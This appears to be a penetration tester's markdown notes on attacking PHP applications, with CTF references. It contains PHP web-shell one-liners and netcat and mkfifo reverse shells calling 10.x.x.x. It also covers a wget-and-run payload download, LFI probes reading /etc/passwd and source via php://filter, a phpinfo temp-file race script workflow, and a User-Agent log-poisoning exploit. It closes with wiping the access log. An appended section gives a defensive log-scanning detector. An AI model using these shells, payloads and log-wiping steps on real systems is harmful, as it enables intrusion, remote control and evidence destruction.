# php

## Basics

* Combined with a [Local File Inclusion](/04-webapps/lfi.md), you can make php get you a shell
* REF: [phpLite](/04-webapps/phplite.md), ninevehHTB, [WebInjections](/04-webapps/03-webapp.md), [ReverseShells](/03-getting-in/03-reverseshell-php.md#php-web-shell)
* Make sure to URL Encode your Injection with [Burp](/02-scanning/burp.md#url-encode) or [MeyerWeb](https://meyerweb.com/eric/tools/dencoder/)

## Reverse Shell

* Two options to try:

```
<?php system($_GET["cmd"]); ?>               ..should work
<?php echo system($_REQUEST ["cmd"]); ?>     ..one I normally see

http://web/hi.php?notes=/../note.php&cmd=nc -e /bin/sh 10.x.x.x 4444
http://web/hi.php?notes=/../note.php&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 4444 > /tmp/f
```

## Downloading

```
<?php system("wget $IP/shell.php -O /tmp/shell.php; php /tmp/shell.php"); ?>
```

## php explore

* REF: poisonHTB

```
https://$IP/phpinfo.php                 ..Found: file_uploads 'On'
https://$IP/browse.php                  ..page can run local php scripts
https://$IP/browse.php?file=Hello       ..fail
https://$IP/browse.php?file=index.php   ..ok

Encode to view Source:
https://$IP/browse.php?file=php://filter/convert.base64-encode/resource=index.php   ..encodes b64
echo PD9waHAKcHJ.. | base64 -d  ..<?php print_r(ini_get_all());?>

https://$IP/browse.php?file=http://$MyIP/Anyfile   ..http wrapper disabled
https://$IP/browse.php?file=ftp://$MyIP/Anyfile    ..ftp wrapper disabled
https://$IP/browse.php?file=expect://ls            ..unable to find wrapper
https://$IP/browse.php?file=/etc/passwd            ..ok (found username)
```

## phpinfo - fileupload - vulnerability

* Check options for: **phpinfo.php**
* If `file_uploads = On`, the server will accept any file you send in a multipart POST, even to a page that does not handle uploads.
* php saves each upload to a temporary directory (normally not accessible to users) for the duration of the request; phpinfo.php prints that temp path under `_FILES`.
* Combined with an LFI that can include the temp file while it still exists, this can give code execution
* Test with Burp Intercept:

```
POST /phpinfo.php HTTP/1.1
Host: $IP
Content-Type: multipart/form-data; boundary=--HelloWorld

----HelloWorld
Content-Disposition: form-data; name="blah"; filename="TestFile"
Content-Type: text/plain

Does this work
----HelloWorld--

View phpinfo results to see if our file was accepted:
"PHP Variables"            ..header
_FILES["blah"]             ..found! (shows name, type, tmp_name, size)
```

## phpinfo - LFI

* <https://insomniasec.com/cdn-assets/LFI_With_PHPInfo_Assistance.pdf>
* Github > [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) > FileInclusion > **phpinfolfi.py**

```
---------------------
---------------------
Replace the PAYLOAD with a full reverse-payload
PAYLOAD="""$s\r<?php...;?> \r""" % TAG
(keep all the weird bits.. just focus on swapping the php line)
<?php...;?>

---------------------
---------------------
locate php-reverse
php-reverse-shell.php
paste into phpinfolfi.py as 'payload'
<?php...?>
update ip, port
del comments
LFIREQ="""GET... /browse.php?file=%s HTTP/1.1\r
i = d.find("[tmp_name] =>")    ..problem
i = d.find("[tmp_name] =&gt")  ..fixed twice in script

---------------------
---------------------
python phpinfolfi.py $IP 80 100
.. port 80
.. threads 100

nc -nvlp 9001  ..got a shell
```

## Log Poisoning

* Submit an evil log entry (custom User-Agent header gets written to the access log)
* Execute it by viewing the log through an LFI
* If the php tags do not appear in the included log output, they were interpreted rather than printed, so we can inject our payload there
* REF: [php](/04-webapps/php-tricks.md), poisonHTB

```
TEST 1

View Log:
https://$IP/browse.php > /var/log/httpd-access.log
curl https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: Hello World

Confirm:
Notice "Hello World" was sent as the User-Agent
We have control over this field, and we can send malicious payload here
```

```
TEST 2

Burp > Repeater > Custom "User-Agent"
https://$IP/doesntmatter
User-Agent: <?php echo('Hello World'); ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
We see "Hello World" in the log
php tags were interpreted (i.e. we don't see them written in plain text)
Meaning we have execution!
```

```
EXPLOIT

Burp > Repeater > Custom "User-Agent"
GET /doesntmatter HTTP/1.1
User-Agent: <?php system($_REQUEST['cmd']) ?>

https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=hostname
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls -la
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=uname -a
https://$IP/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f
(might need burp url-encode)

nc -nvlp 4444  ..connected!
```

```
bsd reverse netcat
bsd doesn't like the 'normal' reverse (its nc lacks -e and the 2>&1 version misbehaves)

normal:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.x.x.x 9002 >/tmp/f

bsd version:
mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.x.x.x 4444 >/tmp/f            ..ippsec
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i|nc 10.x.x.x 4444 >/tmp/f   ..maybe
```

```
Log issue:

vi /var/log/httpd-access.log
delete our bad line from the earlier mistake, oops
(we used echo "Hello World" with double-quotes, which broke the log line)

Wipe the log file:
echo "" > httpd-access.log
```
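Defensive counterpart to the php explore and log poisoning notes above, added here and not part of the original notes: a small detector that parses constructed combined-format access-log lines and flags the indicators these notes rely on (stream wrappers or traversal in the `file` parameter, php tags arriving in the User-Agent). The sample lines and all tags are assumptions for the demo.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format), not from a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:10:00:01 +0000] "GET /browse.php?file=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:10:00:02 +0000] "GET /browse.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:10:00:03 +0000] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Mar/2024:10:00:04 +0000] "GET /doesntmatter HTTP/1.1" 404 200 "-" "<?php system($_REQUEST['cmd']) ?>"
10.0.0.9 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "curl/8.0"
"""

# Apache/nginx "combined" format: ip ident user [time] "req" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Indicators drawn from the notes: stream wrappers and traversal in the path
# (checked after URL-decoding, since the notes use %2F), and php tags in a
# client-controlled header, which is the log poisoning precondition.
WRAPPER_RE = re.compile(r'(php|expect|data|ftp|http)://', re.I)
TRAVERSAL_RE = re.compile(r'(\.\./|/etc/passwd|/var/log/)', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.I)

def classify(line):
    """Return (ip, [findings]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(m.group('path'))
    findings = []
    if WRAPPER_RE.search(path):
        findings.append('wrapper-in-path')
    if TRAVERSAL_RE.search(path):
        findings.append('traversal-in-path')
    if PHP_TAG_RE.search(m.group('ua')):
        findings.append('php-tag-in-user-agent')
    if PHP_TAG_RE.search(path) or PHP_TAG_RE.search(m.group('ref')):
        findings.append('php-tag-in-request')
    return m.group('ip'), findings

def scan(text):
    """Scan a whole log; keep only lines with at least one finding."""
    hits = []
    for line in text.splitlines():
        r = classify(line)
        if r and r[1]:
            hits.append(r)
    return hits

if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ', '.join(findings))
```

Pipe a real `httpd-access.log` into `scan()` to get the same triage; a php tag in the User-Agent of any request is worth an alert on its own, regardless of whether an LFI exists.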


